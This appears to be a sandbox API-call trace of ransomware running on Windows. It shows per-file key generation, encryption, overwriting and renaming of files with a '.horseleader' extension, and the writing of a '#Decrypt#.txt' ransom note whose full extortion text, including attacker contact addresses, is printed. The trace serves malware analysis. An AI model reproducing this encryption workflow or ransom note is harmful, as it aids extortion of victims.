[0247.626] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0247.627] StrStrW (lpFirst="RADIAL.ELM", lpSrch=".txt") returned 0x0 [0247.627] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=46942) returned 1 [0247.627] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.630] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.630] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.630] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.631] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.631] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.631] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x175e, lpOverlapped=0x0) returned 1 [0247.631] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.631] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x175e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x175e, lpOverlapped=0x0) returned 1 [0247.632] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.632] CloseHandle (hObject=0x1a4) returned 1 [0247.632] GetProcessHeap () returned 0x780000 [0247.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM.horseleader") returned 89 [0247.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM" (normalized: "c:\\program files\\common 
files\\microsoft shared\\themes14\\radial\\radial.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm.horseleader")) returned 1 [0247.635] GetProcessHeap () returned 0x780000 [0247.635] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RADIAL.INF", cAlternateFileName="")) returned 1 [0247.635] lstrcmpiW (lpString1="RADIAL.INF", lpString2="Windows") returned -1 [0247.635] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0247.635] StrStrIW (lpFirst="RADIAL.INF", lpSrch=".horseleader") returned 0x0 [0247.635] lstrcmpW (lpString1="RADIAL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.635] lstrcmpW (lpString1="RADIAL.INF", lpString2="_uninstalling_.png") returned 1 [0247.636] lstrlenW (lpString=".testttjffg") returned 11 [0247.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF", lpSrch=".testttjffg") returned 0x0 [0247.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.636] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0247.637] StrStrW (lpFirst="RADIAL.INF", lpSrch=".txt") returned 0x0 [0247.637] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=586) returned 1 [0247.637] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24a, lpOverlapped=0x0) returned 1 [0247.638] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.639] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.639] 
CloseHandle (hObject=0x1a4) returned 1 [0247.639] GetProcessHeap () returned 0x780000 [0247.639] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.639] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF.horseleader") returned 89 [0247.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.inf.horseleader")) returned 1 [0247.642] GetProcessHeap () returned 0x780000 [0247.642] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.642] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4c6b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.642] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.642] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0247.642] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.642] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.642] lstrcmpW 
(lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.642] lstrlenW (lpString=".testttjffg") returned 11 [0247.642] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.642] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.642] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.643] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.643] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 79 [0247.643] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.643] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19563) returned 1 [0247.643] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4c6b, lpOverlapped=0x0) returned 1 [0247.645] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb395, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.645] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4c6b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4c6b, lpOverlapped=0x0) returned 1 [0247.646] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.646] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.646] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.646] CloseHandle (hObject=0x1a4) returned 1 [0247.647] GetProcessHeap () returned 0x780000 [0247.647] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.647] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.horseleader") returned 91 [0247.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.horseleader")) returned 1 [0247.648] GetProcessHeap () returned 0x780000 [0247.648] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.648] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, 
nFileSizeLow=0x4c6b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.648] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.648] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\#Decrypt#.txt") returned 80 [0247.648] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.649] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.649] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.650] lstrlenA (lpString="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") returned 1368 [0247.650] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.650] CloseHandle (hObject=0x158) returned 1 [0247.651] GetProcessHeap () returned 0x780000 [0247.651] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.651] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="REFINED", cAlternateFileName="")) returned 1 [0247.651] lstrcmpiW (lpString1="REFINED", lpString2="Windows") returned -1 [0247.651] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned 67 [0247.651] lstrcmpW (lpString1="REFINED", lpString2=".") returned 1 [0247.651] lstrcmpW (lpString1="REFINED", lpString2="..") returned 1 [0247.651] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.651] GetProcessHeap () returned 0x780000 [0247.651] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.651] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*") returned 69 [0247.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.652] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.652] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\.") returned 69 [0247.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.652] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.652] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.652] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\..") returned 70 [0247.653] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0247.653] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.653] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.653] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.653] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0247.653] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.653] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.653] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.653] lstrlenW (lpString=".testttjffg") returned 11 [0247.653] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.653] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.653] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.654] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 79 [0247.654] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.654] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1423) returned 1 [0247.654] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x58f, lpOverlapped=0x0) returned 1 [0247.656] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.656] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x58f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x58f, lpOverlapped=0x0) returned 1 [0247.657] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.657] CloseHandle (hObject=0x1a4) returned 1 [0247.657] GetProcessHeap () returned 0x780000 [0247.657] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.657] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\REFINED\\PREVIEW.GIF.horseleader") returned 91 [0247.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.horseleader")) returned 1 [0247.659] GetProcessHeap () returned 0x780000 [0247.659] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec9f100, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ec9f100, 